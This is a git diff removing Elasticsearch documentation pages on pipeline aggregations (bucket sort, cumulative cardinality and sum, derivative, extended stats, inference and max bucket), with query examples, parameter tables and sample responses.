/dev/null @@ -1,190 +0,0 @@ -[[search-aggregations-pipeline-bucket-sort-aggregation]] -=== Bucket sort aggregation -++++ -Bucket sort -++++ - -A parent pipeline aggregation which sorts the buckets of its parent multi-bucket aggregation. -Zero or more sort fields may be specified together with the corresponding sort order. -Each bucket may be sorted based on its `_key`, `_count` or its sub-aggregations. -In addition, parameters `from` and `size` may be set in order to truncate the result buckets. 
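For instance, a minimal sketch (shown in isolation rather than against a particular index) that keeps only the five most populous buckets by ordering on `_count`:

[source,js]
--------------------------------------------------
{
  "bucket_sort": {
    "sort": [
      { "_count": { "order": "desc" } } <1>
    ],
    "size": 5
  }
}
--------------------------------------------------
// NOTCONSOLE
<1> `_count` sorts the parent aggregation's buckets by their document count.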
- -NOTE: The `bucket_sort` aggregation, like all pipeline aggregations, is executed after all other non-pipeline aggregations. -This means the sorting only applies to whatever buckets are already returned from the parent aggregation. For example, -if the parent aggregation is `terms` and its `size` is set to `10`, the `bucket_sort` will only sort over those 10 -returned term buckets. - -==== Syntax - -A `bucket_sort` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "bucket_sort": { - "sort": [ - { "sort_field_1": { "order": "asc" } }, <1> - { "sort_field_2": { "order": "desc" } }, - "sort_field_3" - ], - "from": 1, - "size": 3 - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Here, `sort_field_1` is the bucket path to the variable to be used as the primary sort and its order -is ascending. - -[[bucket-sort-params]] -.`bucket_sort` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`sort` |The list of fields to sort on. See <> for more details. |Optional | -|`from` |Buckets in positions prior to the set value will be truncated. |Optional | `0` -|`size` |The number of buckets to return. Defaults to all buckets of the parent aggregation. |Optional | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` -|=== - -The following snippet returns the buckets corresponding to the 3 months with the highest total sales in descending order: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "total_sales": { - "sum": { - "field": "price" - } - }, - "sales_bucket_sort": { - "bucket_sort": { - "sort": [ - { "total_sales": { "order": "desc" } } <1> - ], - "size": 3 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `sort` is set to use the values of `total_sales` in descending order -<2> `size` is set to `3` meaning only the top 3 months in `total_sales` will be returned - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 82, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "total_sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "total_sales": { - "value": 375.0 - }, - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "total_sales": { - "value": 60.0 - }, - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 82/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Truncating without sorting - -It is also possible to use this aggregation in order to truncate the result buckets -without doing any sorting. To do so, just use the `from` and/or `size` parameters -without specifying `sort`. 
- -The following example simply truncates the result so that only the second bucket is returned: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "bucket_truncate": { - "bucket_sort": { - "from": 1, - "size": 1 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/cumulative-cardinality-aggregation.asciidoc b/docs/reference/aggregations/pipeline/cumulative-cardinality-aggregation.asciidoc deleted file mode 100644 index 70f907b7cda..00000000000 --- a/docs/reference/aggregations/pipeline/cumulative-cardinality-aggregation.asciidoc +++ /dev/null @@ -1,236 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-pipeline-cumulative-cardinality-aggregation]] -=== Cumulative cardinality aggregation -++++ -Cumulative cardinality -++++ - -A parent pipeline aggregation which calculates the Cumulative Cardinality in a parent histogram (or date_histogram) -aggregation. The specified metric must be a cardinality aggregation and the enclosing histogram -must have `min_doc_count` set to `0` (default for `histogram` aggregations). - -The `cumulative_cardinality` agg is useful for finding "total new items", like the number of new visitors to your -website each day. A regular cardinality aggregation will tell you how many unique visitors came each day, but doesn't -differentiate between "new" or "repeat" visitors. The Cumulative Cardinality aggregation can be used to determine -how many of each day's unique visitors are "new". 
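As a hypothetical illustration: if day one sees users `{a, b}`, day two sees `{b, c}` and day three sees `{c, d, e}`, the per-day cardinalities are 2, 2 and 3, while the cumulative cardinality grows from 2 to 3 to 4, because only one visitor on each of the later days is genuinely new. The example below produces exactly this shape of result.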
- -==== Syntax - -A `cumulative_cardinality` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "cumulative_cardinality": { - "buckets_path": "my_cardinality_agg" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[cumulative-cardinality-params]] -.`cumulative_cardinality` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the cardinality aggregation we wish to find the cumulative cardinality for (see <> for more - details) |Required | -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the cumulative cardinality of the total daily `users`: - -[source,console] --------------------------------------------------- -GET /user_hits/_search -{ - "size": 0, - "aggs": { - "users_per_day": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "distinct_users": { - "cardinality": { - "field": "user_id" - } - }, - "total_new_users": { - "cumulative_cardinality": { - "buckets_path": "distinct_users" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:user_hits] - -<1> `buckets_path` instructs this aggregation to use the output of the `distinct_users` aggregation for the cumulative cardinality - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "users_per_day": { - "buckets": [ - { - "key_as_string": "2019-01-01T00:00:00.000Z", - "key": 1546300800000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 2 - } - }, - { - "key_as_string": "2019-01-02T00:00:00.000Z", - "key": 1546387200000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 3 - } - }, - { - "key_as_string": "2019-01-03T00:00:00.000Z", - "key": 1546473600000, - "doc_count": 3, - "distinct_users": { - "value": 3 - }, - "total_new_users": { - "value": 4 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - - -Note how the second day, `2019-01-02`, has two distinct users but the `total_new_users` metric generated by the -cumulative pipeline agg only increments to three. This means that only one of the two users that day were -new, the other had already been seen in the previous day. This happens again on the third day, where only -one of three users is completely new. - -==== Incremental cumulative cardinality - -The `cumulative_cardinality` agg will show you the total, distinct count since the beginning of the time period -being queried. Sometimes, however, it is useful to see the "incremental" count. Meaning, how many new users -are added each day, rather than the total cumulative count. 
- -This can be accomplished by adding a `derivative` aggregation to our query: - -[source,console] --------------------------------------------------- -GET /user_hits/_search -{ - "size": 0, - "aggs": { - "users_per_day": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "distinct_users": { - "cardinality": { - "field": "user_id" - } - }, - "total_new_users": { - "cumulative_cardinality": { - "buckets_path": "distinct_users" - } - }, - "incremental_new_users": { - "derivative": { - "buckets_path": "total_new_users" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:user_hits] - - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "users_per_day": { - "buckets": [ - { - "key_as_string": "2019-01-01T00:00:00.000Z", - "key": 1546300800000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 2 - } - }, - { - "key_as_string": "2019-01-02T00:00:00.000Z", - "key": 1546387200000, - "doc_count": 2, - "distinct_users": { - "value": 2 - }, - "total_new_users": { - "value": 3 - }, - "incremental_new_users": { - "value": 1.0 - } - }, - { - "key_as_string": "2019-01-03T00:00:00.000Z", - "key": 1546473600000, - "doc_count": 3, - "distinct_users": { - "value": 3 - }, - "total_new_users": { - "value": 4 - }, - "incremental_new_users": { - "value": 1.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/cumulative-sum-aggregation.asciidoc b/docs/reference/aggregations/pipeline/cumulative-sum-aggregation.asciidoc deleted file mode 100644 index 9d4bd340320..00000000000 --- a/docs/reference/aggregations/pipeline/cumulative-sum-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-cumulative-sum-aggregation]] -=== Cumulative sum aggregation -++++ -Cumulative sum -++++ - -A parent pipeline aggregation which calculates the cumulative sum of a specified metric in a parent histogram (or date_histogram) -aggregation. The specified metric must be numeric and the enclosing histogram must have `min_doc_count` set to `0` (default -for `histogram` aggregations). 
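In other words, if the per-bucket metric values are `v1, v2, ..., vn`, bucket `k` is annotated with the running total `v1 + v2 + ... + vk`. With the monthly sales sums used in the example below (550, 60 and 375), this yields 550, 610 and 985.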
- -==== Syntax - -A `cumulative_sum` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "cumulative_sum": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[cumulative-sum-params]] -.`cumulative_sum` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the cumulative sum for (see <> for more - details) |Required | -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the cumulative sum of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "cumulative_sales": { - "cumulative_sum": { - "buckets_path": "sales" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this cumulative sum aggregation to use the output of the `sales` aggregation for the cumulative sum - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - }, - "cumulative_sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "cumulative_sales": { - "value": 610.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "cumulative_sales": { - "value": 985.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/derivative-aggregation.asciidoc b/docs/reference/aggregations/pipeline/derivative-aggregation.asciidoc deleted file mode 100644 index 92ea053f01a..00000000000 --- a/docs/reference/aggregations/pipeline/derivative-aggregation.asciidoc +++ /dev/null @@ -1,317 +0,0 @@ -[[search-aggregations-pipeline-derivative-aggregation]] -=== Derivative aggregation -++++ -Derivative -++++ - -A parent pipeline aggregation which calculates the derivative of a specified metric in a parent histogram (or date_histogram) -aggregation. The specified metric must be numeric and the enclosing histogram must have `min_doc_count` set to `0` (default -for `histogram` aggregations). 
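Conceptually, the first-order derivative reported for bucket `k` is the difference between that bucket's metric value and the previous bucket's value. With the monthly sales sums used in the examples below (550, 60 and 375), February's derivative is `60 - 550 = -490` and March's is `375 - 60 = 315`; the first bucket gets no derivative because it has no predecessor.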
- -==== Syntax - -A `derivative` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -"derivative": { - "buckets_path": "the_sum" -} --------------------------------------------------- -// NOTCONSOLE - -[[derivative-params]] -.`derivative` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the derivative for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` - |`format` |format to apply to the output value of this aggregation |Optional | `null` -|=== - - -==== First Order Derivative - -The following snippet calculates the derivative of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "sales_deriv": { - "derivative": { - "buckets_path": "sales" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this derivative aggregation to use the output of the `sales` aggregation for the derivative - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } <1> - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "sales_deriv": { - "value": -490.0 <2> - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, <3> - "sales": { - "value": 375.0 - }, - "sales_deriv": { - "value": 315.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> No derivative for the first bucket since we need at least 2 data points to calculate the derivative -<2> Derivative value units are implicitly defined by the `sales` aggregation and the parent histogram so in this case the units -would be $/month assuming the `price` field has units of $. 
-<3> The number of documents in the bucket are represented by the `doc_count` - -==== Second Order Derivative - -A second order derivative can be calculated by chaining the derivative pipeline aggregation onto the result of another derivative -pipeline aggregation as in the following example which will calculate both the first and the second order derivative of the total -monthly sales: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "sales_deriv": { - "derivative": { - "buckets_path": "sales" - } - }, - "sales_2nd_deriv": { - "derivative": { - "buckets_path": "sales_deriv" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` for the second derivative points to the name of the first derivative - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 50, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } <1> - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "sales_deriv": { - "value": -490.0 - } <1> - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "sales_deriv": { - "value": 315.0 - }, - "sales_2nd_deriv": { - "value": 805.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 50/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> No second derivative for the first two buckets since we need at least 2 data points from the first derivative to calculate the -second derivative - -==== Units - -The derivative aggregation allows the units of the derivative values to be specified. This returns an extra field in the response -`normalized_value` which reports the derivative value in the desired x-axis units. 
In the below example we calculate the derivative -of the total sales per month but ask for the derivative of the sales as in the units of sales per day: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - }, - "sales_deriv": { - "derivative": { - "buckets_path": "sales", - "unit": "day" <1> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> `unit` specifies what unit to use for the x-axis of the derivative calculation - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 50, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } <1> - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - }, - "sales_deriv": { - "value": -490.0, <1> - "normalized_value": -15.806451612903226 <2> - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - }, - "sales_deriv": { - "value": 315.0, - "normalized_value": 11.25 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 50/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> `value` is reported in the original units of 'per month' -<2> `normalized_value` is reported in the desired units of 'per day' diff --git a/docs/reference/aggregations/pipeline/extended-stats-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/extended-stats-bucket-aggregation.asciidoc deleted file mode 100644 index a1d0674c803..00000000000 --- a/docs/reference/aggregations/pipeline/extended-stats-bucket-aggregation.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[search-aggregations-pipeline-extended-stats-bucket-aggregation]] -=== Extended stats bucket aggregation -++++ -Extended stats bucket -++++ - -A sibling pipeline aggregation which calculates a variety of stats across all bucket of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -This aggregation provides a few more statistics (sum of squares, standard deviation, etc) compared to the `stats_bucket` aggregation. 
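The `std_deviation_bounds` object in the response is derived from the mean and the standard deviation using the `sigma` parameter described below: `upper = avg + sigma * std_deviation` and `lower = avg - sigma * std_deviation`. With the default `sigma` of `2`, the example response below reports `328.33 + 2 * 202.75`, approximately 733.82, as the upper bound.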
- -==== Syntax - -A `extended_stats_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "extended_stats_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[extended-stats-bucket-params]] -.`extended_stats_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to calculate stats for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` -|`format` |format to apply to the output value of this aggregation |Optional | `null` -|`sigma` |The number of standard deviations above/below the mean to display |Optional | 2 -|=== - -The following snippet calculates the extended stats for monthly `sales` bucket: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "stats_monthly_sales": { - "extended_stats_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `bucket_paths` instructs this `extended_stats_bucket` aggregation that we want the calculate stats for the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "stats_monthly_sales": { - "count": 3, - "min": 60.0, - "max": 550.0, - "avg": 328.3333333333333, - "sum": 985.0, - "sum_of_squares": 446725.0, - "variance": 41105.55555555556, - "variance_population": 41105.55555555556, - "variance_sampling": 61658.33333333334, - "std_deviation": 202.74505063146563, - "std_deviation_population": 202.74505063146563, - "std_deviation_sampling": 248.3109609609156, - "std_deviation_bounds": { - "upper": 733.8234345962646, - "lower": -77.15676792959795, - "upper_population" : 733.8234345962646, - "lower_population" : -77.15676792959795, - "upper_sampling" : 824.9552552551645, - "lower_sampling" : -168.28858858849787 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/inference-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/inference-bucket-aggregation.asciidoc deleted file mode 100644 index 808bd5ddbd7..00000000000 --- a/docs/reference/aggregations/pipeline/inference-bucket-aggregation.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[role="xpack"] -[testenv="basic"] 
-[[search-aggregations-pipeline-inference-bucket-aggregation]] -=== {infer-cap} bucket aggregation -++++ -{infer-cap} bucket -++++ - -experimental::[] - -A parent pipeline aggregation which loads a pre-trained model and performs -{infer} on the collated result fields from the parent bucket aggregation. - -To use the {infer} bucket aggregation, you need to have the same security -privileges that are required for using the <>. - -[[inference-bucket-agg-syntax]] -==== Syntax - -A `inference` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "inference": { - "model_id": "a_model_for_inference", <1> - "inference_config": { <2> - "regression_config": { - "num_top_feature_importance_values": 2 - } - }, - "buckets_path": { - "avg_cost": "avg_agg", <3> - "max_cost": "max_agg" - } - } -} --------------------------------------------------- -// NOTCONSOLE -<1> The ID of model to use. -<2> The optional inference config which overrides the model's default settings -<3> Map the value of `avg_agg` to the model's input field `avg_cost` - - -[[inference-bucket-params]] -.`inference` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -| `model_id` | The ID of the model to load and infer against | Required | - -| `inference_config` | Contains the inference type and its options. There are two types: <> and <> | Optional | - -| `buckets_path` | Defines the paths to the input aggregations and maps the aggregation names to the field names expected by the model. -See <> for more details | Required | - -|=== - - -==== Configuration options for {infer} models - -The `inference_config` setting is optional and usually isn't required as the -pre-trained models come equipped with sensible defaults. In the context of -aggregations some options can be overridden for each of the two types of model. 
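For example, a sketch of a {classification} override that mirrors the {regression} example above, assuming the classification options are nested under a `classification_config` object in the same way, and using the option names listed below (the model ID and bucket path are placeholders):

[source,js]
--------------------------------------------------
{
  "inference": {
    "model_id": "a_model_for_inference",
    "inference_config": {
      "classification_config": {
        "num_top_classes": 2,
        "prediction_field_type": "string"
      }
    },
    "buckets_path": {
      "avg_cost": "avg_agg"
    }
  }
}
--------------------------------------------------
// NOTCONSOLE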
- -[discrete] -[[inference-agg-regression-opt]] -===== Configuration options for {regression} models - -`num_top_feature_importance_values`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - -[discrete] -[[inference-agg-classification-opt]] -===== Configuration options for {classification} models - -`num_top_classes`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`prediction_field_type`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - - -[[inference-bucket-agg-example]] -==== Example - -The following snippet aggregates a web log by `client_ip` and extracts a number -of features via metric and bucket sub-aggregations as input to the {infer} -aggregation configured with a model trained to identify suspicious client IPs: - -[source,console] -------------------------------------------------- -GET kibana_sample_data_logs/_search -{ - "size": 0, - "aggs": { - "client_ip": { <1> - "composite": { - "sources": [ - { - "client_ip": { - "terms": { - "field": "clientip" - } - } - } - ] - }, - "aggs": { <2> - "url_dc": { - "cardinality": { - "field": "url.keyword" - } - }, - "bytes_sum": { - "sum": { - "field": "bytes" - } - }, - "geo_src_dc": { - "cardinality": { - "field": "geo.src" - } - }, - "geo_dest_dc": { - "cardinality": { - "field": "geo.dest" - } - }, - "responses_total": { - "value_count": { - "field": "timestamp" - } - }, - "success": { - "filter": { - "term": { - "response": "200" - } - } - }, - "error404": { - "filter": { - "term": { - "response": "404" - } - } - }, - "error503": { - "filter": { - "term": { - "response": "503" - } - } - }, - "malicious_client_ip": { <3> - "inference": { - "model_id": "malicious_clients_model", - "buckets_path": { - "response_count": "responses_total", - "url_dc": "url_dc", - "bytes_sum": "bytes_sum", - "geo_src_dc": "geo_src_dc", - "geo_dest_dc": "geo_dest_dc", - "success": "success._count", - "error404": "error404._count", - "error503": "error503._count" - } - } - } - } - } - } -} -------------------------------------------------- -// TEST[skip:setup kibana sample data] - -<1> A composite bucket aggregation that aggregates the data by `client_ip`. -<2> A series of metrics and bucket sub-aggregations. -<3> {infer-cap} bucket aggregation that contains the model ID and maps the -aggregation names to the model's input fields. diff --git a/docs/reference/aggregations/pipeline/max-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/max-bucket-aggregation.asciidoc deleted file mode 100644 index bb01bb28f2b..00000000000 --- a/docs/reference/aggregations/pipeline/max-bucket-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-max-bucket-aggregation]] -=== Max bucket aggregation -++++ -Max bucket -++++ - -A sibling pipeline aggregation which identifies the bucket(s) with the maximum value of a specified metric in a sibling aggregation -and outputs both the value and the key(s) of the bucket(s). The specified metric must be numeric and the sibling aggregation must -be a multi-bucket aggregation. 
- -==== Syntax - -A `max_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "max_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[max-bucket-params]] -.`max_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the maximum for (see <> for more - details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional | `skip` - |`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the maximum of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "max_monthly_sales": { - "max_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this max_bucket aggregation that we want the maximum value of the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "max_monthly_sales": { - "keys": ["2015/01/01 00:00:00"], <1> - "value": 550.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -<1> `keys` is an array of strings since the maximum value may be present in multiple buckets diff --git a/docs/reference/aggregations/pipeline/min-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/min-bucket-aggregation.asciidoc deleted file mode 100644 index c2185303ab7..00000000000 --- a/docs/reference/aggregations/pipeline/min-bucket-aggregation.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[[search-aggregations-pipeline-min-bucket-aggregation]] -=== Min bucket aggregation -++++ -Min bucket -++++ 